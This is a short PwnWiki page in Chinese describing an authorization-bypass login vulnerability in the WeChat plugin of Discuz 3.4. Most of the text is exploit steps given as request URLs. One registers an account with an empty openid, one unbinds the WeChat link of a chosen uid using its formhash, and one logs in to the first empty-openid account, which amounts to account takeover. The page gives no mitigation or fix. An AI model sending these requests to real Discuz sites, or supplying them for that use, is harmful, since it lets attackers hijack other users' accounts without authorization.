Discuz3.4越權登錄漏洞

From PwnWiki

Revision as of 10:52, 10 April 2021 by Pwnwiki (talk | contribs) (Created page with "==漏洞利用== 通過<code>/plugin.php?id=wechat:wechat&ac=wxregister&username={name}</code>這種方式可以使openid為空，但註冊的是一個新的賬號。解除...")

(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

漏洞利用

通過/plugin.php?id=wechat:wechat&ac=wxregister&username={name}這種方式可以使openid為空，但註冊的是一個新的賬號。

解除指定uid綁定的微信：

/plugin.php?id=wechat:wechat&ac=unbindmp&uid={uid}&hash={formhash}

登陸第一個openid為空的賬號：/plugin.php?id=wechat:wechat&ac=wxregister

Retrieved from "https://pwnwiki.com/index.php?title=Discuz3.4越權登錄漏洞&oldid=1442"